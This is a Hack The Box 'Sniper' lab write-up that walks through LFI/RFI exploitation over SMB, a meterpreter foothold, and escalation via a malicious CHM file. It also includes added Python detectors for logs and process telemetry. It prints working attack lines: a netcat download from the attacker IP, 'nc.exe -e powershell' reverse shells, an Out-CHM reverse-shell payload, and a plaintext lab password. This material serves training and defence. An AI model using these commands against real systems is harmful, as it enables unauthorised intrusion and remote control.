If you are interested in penetration testing or want to improve your ethical hacking skills, Hack The Box’s Sniper Virtual Machine is a great challenge for you. In this article, we will take a detailed look at the entire process, from the Recon phase to escalating privileges to the admin level.
This article continues the series of write-ups for machines from the HackTheBox platform and may be useful to anyone developing their skills in information security. It covers the exploitation of RFI, working around the blocking of the meterpreter shell, and creating a malicious CHM document.
Connection to the lab is via VPN. It is recommended not to use a work computer or a device holding important data, since you are connecting to a private network shared with other, experienced, information security specialists.
This machine has the IP address 10.10.10.151, which we add to /etc/hosts.
10.10.10.151 sniper.htb
First, scan the full TCP and UDP port ranges with masscan:
masscan -e tun0 -p1-65535,U:1-65535 10.10.10.151 --rate=1000
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A sniper.htb -p80,135,139,445
Four ports are open on the host; let's see what the web server has to offer.
The first three links are empty, but the other two lead to the blog and the login page.
The assumption is confirmed: the page is vulnerable to LFI (Local File Inclusion).
It is also worth testing for RFI (Remote File Inclusion). To do this, we create a test file that will be served to the target for further investigation of the vulnerability.
To deploy a local Samba SMB server, edit /etc/samba/smb.conf: define a share whose path points at the directory containing the test file and allow guest access to it.
Start the smbd service.
service smbd start
Requesting the shared file through the vulnerable parameter gives a positive result.
Now we deliver the payload. We create it with msfvenom, then start the listener.
Requesting the file gives us a connection.
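The LFI and RFI probes described above leave recognisable traces in the web server's access log. The following script is an added example for this write-up, not code from the original article or from Hack The Box: it parses constructed Apache-style log lines (the parameter name `lang` is an assumption; every query parameter is inspected) and labels values that look like directory traversal, a UNC path, an absolute drive path, or a remote URL/stream wrapper.

```python
"""Spot LFI/RFI probes in web-server access logs.

Added example for this write-up; it is not code from the original article
or from Hack The Box. The log lines are constructed samples in Apache
combined format, and the parameter name 'lang' is an assumption: the
detector inspects every query parameter regardless of its name.
"""
import re
from typing import Optional
from urllib.parse import parse_qsl, unquote

# Constructed sample log lines: one benign request, then a traversal probe,
# a UNC-path include (the SMB-based RFI used in the write-up) and an HTTP URL.
SAMPLE_LOG = r"""
10.10.15.55 - - [01/Jan/2024:10:00:01 +0000] "GET /blog/?lang=blog-en.php HTTP/1.1" 200 512
10.10.15.55 - - [01/Jan/2024:10:00:02 +0000] "GET /blog/?lang=../../../../windows/win.ini HTTP/1.1" 200 300
10.10.15.55 - - [01/Jan/2024:10:00:03 +0000] "GET /blog/?lang=\\10.10.15.55\share\test.php HTTP/1.1" 200 40
10.10.15.55 - - [01/Jan/2024:10:00:04 +0000] "GET /blog/?lang=http://10.10.15.55/test.php HTTP/1.1" 500 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# URL schemes and stream wrappers that turn an include() into a remote fetch.
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:", "file://")


def classify_value(value: str) -> Optional[str]:
    """Return an indicator label for a parameter value, or None if it looks benign."""
    decoded = value
    for _ in range(3):  # undo single and double URL-encoding
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    lowered = decoded.lower()
    if decoded.startswith("\\\\") or decoded.startswith("//"):
        return "rfi-unc"        # \\host\share\file is a plain filesystem path on Windows
    if lowered.startswith(REMOTE_SCHEMES):
        return "rfi-url"
    if "../" in decoded or "..\\" in decoded:
        return "lfi-traversal"
    if re.match(r"^[a-z]:[\\/]", lowered):
        return "lfi-absolute"   # C:\... drive-letter path
    return None


def scan_log(text: str) -> list:
    """Parse access-log lines and return one finding per suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        _path, _sep, query = m["target"].partition("?")
        for name, value in parse_qsl(query, keep_blank_values=True):
            kind = classify_value(value)
            if kind:
                findings.append({
                    "ip": m["ip"], "param": name, "kind": kind,
                    "value": value, "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['value']!r} -> {f['kind']} (HTTP {f['status']})")
```

The UNC case deserves a separate label because, on Windows, PHP treats `\\host\share\file.php` as a local path, so disabling `allow_url_include` does not stop it; the effective mitigations are an allowlist of includable file names in the application and blocking outbound SMB (TCP 445) from the web server.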
Since the site has a login page, there is a chance of finding at least some credentials. The current working directory is the blog directory.
We download everything in the user's directory.
Reviewing the downloaded files locally, we find database connection credentials.
To enumerate the users on the system, the usual commands were tried. However, executing any command through meterpreter drops the connection. This may indicate that the cmd command processor is blocked; the workaround is to run powershell through meterpreter's execute command, passing the command in its -a parameter.
execute -f powershell -a "net users" -i -H
Now let's run a command in the context of this user. To do this, we pass the following script to powershell as a parameter.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { whoami }" -i -H
Let's transfer netcat to the host. To do this, we start an HTTP server in the directory containing it.
python3 -m http.server 80
Then download it on the target.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { iwr 10.10.15.55/nc -o C:\\Users\\Chris\\Documents\\nc.exe }" -i -H
Now we run netcat, connect to it, and get a session as this user.
execute -f powershell -a "$username = 'SNIPER\Chris' ; $password = '36mEAhz/B8xQ~2VM' ; $securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; Invoke-command -computername SNIPER -credential $credential -scriptblock { C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 6543}" -i -H
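Every one of the Invoke-Command one-liners above ends up in PowerShell script block logging (Event ID 4104) when it is enabled, and the combination of a literal password turned into a SecureString, a PSCredential, and a remote Invoke-Command is a strong signal on its own. The script below is an added example for this write-up, not code from the original article or from Nishang or Metasploit: it applies a small rule set to constructed 4104 records whose ScriptBlockText mirrors the write-up's commands (with a placeholder password and made-up record ids) plus one benign admin script.

```python
"""Triage PowerShell script-block log entries (Event ID 4104) for the
credential-embedding, download and reverse-shell patterns in this write-up.

Added example; not code from the original article or from Nishang/Metasploit.
The events are constructed: ScriptBlockText values mirror the write-up's
Invoke-Command one-liners (password replaced by a placeholder) plus one
benign admin script, and the record ids are made up.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Rule:
    name: str
    patterns: Tuple[str, ...]   # every pattern must match (case-insensitive)


RULES = (
    # A SecureString built from a literal and wrapped in a PSCredential:
    # the password is sitting in the script text.
    Rule("plaintext-credential-object",
         (r"ConvertTo-SecureString\b.*-AsPlainText", r"\bPSCredential\b")),
    # Explicit-credential remoting driven from a script.
    Rule("remoting-with-embedded-credential",
         (r"\bInvoke-Command\b", r"-Credential\b", r"-AsPlainText")),
    # Fetch from the web straight to disk.
    Rule("web-download-to-disk",
         (r"\b(iwr|Invoke-WebRequest|wget|curl)\b", r"\s-o(utfile)?\b")),
    # A netcat-style binary told to attach a shell to a socket.
    Rule("netcat-style-shell",
         (r"\bnc(64)?(\.exe)?\b", r"\s-e\s+(powershell|cmd)\b")),
)


def _remote(cmd: str) -> str:
    """Constructed 4104 text mirroring the write-up's one-liner around `cmd`."""
    return (r"$username = 'SNIPER\Chris' ; $password = 'placeholder-password' ; "
            r"$securePassword = ConvertTo-SecureString $password -AsPlainText -Force ; "
            r"$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword ; "
            r"Invoke-command -computername SNIPER -credential $credential -scriptblock { " + cmd + " }")


EVENTS = [
    {"RecordId": 101, "EventID": 4104, "ScriptBlockText": _remote("whoami")},
    {"RecordId": 102, "EventID": 4104, "ScriptBlockText":
     "Get-Service | Where-Object { $_.Status -eq 'Running' } | Select-Object Name"},
    {"RecordId": 103, "EventID": 4104, "ScriptBlockText":
     _remote(r"iwr 10.10.15.55/nc -o C:\Users\Chris\Documents\nc.exe")},
    {"RecordId": 104, "EventID": 4104, "ScriptBlockText":
     _remote(r"C:\Users\Chris\Documents\nc.exe -e powershell 10.10.15.55 6543")},
]


def match_rules(script_text: str) -> List[str]:
    """Names of all rules whose patterns all occur in the script block."""
    return [rule.name for rule in RULES
            if all(re.search(p, script_text, re.I | re.S) for p in rule.patterns)]


def triage(events) -> Dict[int, List[str]]:
    """Map RecordId -> matched rule names, keeping only records with a hit."""
    result = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        hits = match_rules(ev["ScriptBlockText"])
        if hits:
            result[ev["RecordId"]] = hits
    return result


if __name__ == "__main__":
    for record_id, hits in triage(EVENTS).items():
        print(record_id, ", ".join(hits))
```

Script block logging captures the de-obfuscated text at execution time, so these rules still fire when the one-liner is wrapped in an encoded command; tune the download rule against your own admin tooling before alerting on it.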
After some searching through the directories, a file in CHM format was discovered. Its purpose is unclear at this stage.
In the Docs folder on drive C: there is a note stating that the user has no PHP skills and should prepare documentation, and that the documents should be left in the same folder.
To create a malicious CHM file, HTML Help Workshop is installed first, and then the Out-CHM utility from the Nishang package is used to generate the required file.
Out-CHM -Payload "C:\\Users\\Chris\\Documents\\nc.exe -e powershell 10.10.15.55 8765" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
We save the created file to the target directory on the remote host.
wget http://10.10.15.55/doc.chm -o C:\Docs\doc.chm
The result is a session with administrator rights.
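Both execution paths in this write-up, the web application spawning PowerShell (the meterpreter stage) and the CHM document spawning a process when it is opened (the privilege-escalation stage), show up as unusual parent/child pairs in process-creation telemetry such as Sysmon Event ID 1. The script below is an added example for this write-up, not code from the original article or from Sysmon: it runs three ancestry checks over constructed events. The web-worker image names (w3wp.exe, php-cgi.exe, httpd.exe) are an assumption about typical Windows PHP hosts, and the user names and the cmd.exe child of hh.exe are made up for the sample.

```python
"""Flag suspicious parent/child process pairs in Sysmon process-creation
events (Event ID 1) for the two execution paths in this write-up: a web
worker spawning PowerShell, and hh.exe (the HTML Help viewer that opens
CHM files) spawning anything at all.

Added example; not code from the original article or from Sysmon. The
events are constructed: the web-worker image names are an assumption about
typical Windows PHP hosts, the user names and the hh.exe -> cmd.exe chain
are made up, and the nc.exe path is the one from the write-up.
"""
from typing import Dict, List

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Assumption: processes that host PHP on Windows (IIS worker, CGI, Apache).
WEB_WORKERS = {"w3wp.exe", "php-cgi.exe", "httpd.exe"}

EVENTS = [
    {"RecordId": 1, "User": r"SNIPER\Administrator",
     "ParentImage": r"C:\Windows\hh.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c <constructed payload>"},
    {"RecordId": 2, "User": r"SNIPER\webuser",
     "ParentImage": r"C:\php\php-cgi.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"RecordId": 3, "User": r"SNIPER\Chris",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\Chris\Documents\nc.exe",
     "CommandLine": "nc.exe -e powershell 10.10.15.55 6543"},
    {"RecordId": 4, "User": r"SNIPER\Chris",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, tolerating either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: Dict[str, str]) -> List[str]:
    """Return the names of every ancestry check the event trips."""
    parent = image_name(ev["ParentImage"])
    child = image_name(ev["Image"])
    child_path = ev["Image"].lower()
    hits = []
    if parent == "hh.exe":
        # The help viewer has no routine reason to start other programs;
        # a CHM that does so is the escalation vector in this write-up.
        hits.append("chm-viewer-spawned-child")
    if parent in WEB_WORKERS and child in SHELLS:
        # Web application code reaching a shell: the LFI/RFI foothold.
        hits.append("web-worker-spawned-shell")
    if parent in SHELLS and child not in SHELLS and "\\users\\" in child_path:
        # A shell launching a binary dropped under a user profile (nc.exe here).
        hits.append("shell-launched-user-profile-binary")
    if hits and ev.get("User", "").lower().endswith("\\administrator"):
        # Same behaviour in a privileged context deserves a higher severity.
        hits.append("runs-as-administrator")
    return hits


def triage(events) -> Dict[int, List[str]]:
    """Map RecordId -> tripped checks, keeping only events with a hit."""
    result = {}
    for ev in events:
        hits = check_process(ev)
        if hits:
            result[ev["RecordId"]] = hits
    return result


if __name__ == "__main__":
    for record_id, hits in triage(EVENTS).items():
        print(record_id, ", ".join(hits))
```

The hh.exe rule is deliberately broad; if legitimate help files in your environment launch a browser, narrow it to shells and binaries outside the Windows directory rather than dropping it, since the note in C:\Docs is exactly the kind of social-engineering hook that gets a CHM opened by a privileged user.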
The article describes the Sniper VM walkthrough on the Hack The Box platform, including the detection and exploitation of LFI and RFI vulnerabilities, bypassing shell blocking, and creating a malicious CHM file for privilege escalation. The article emphasizes the importance of properly securing servers, configuring file access, and verifying the security of web applications.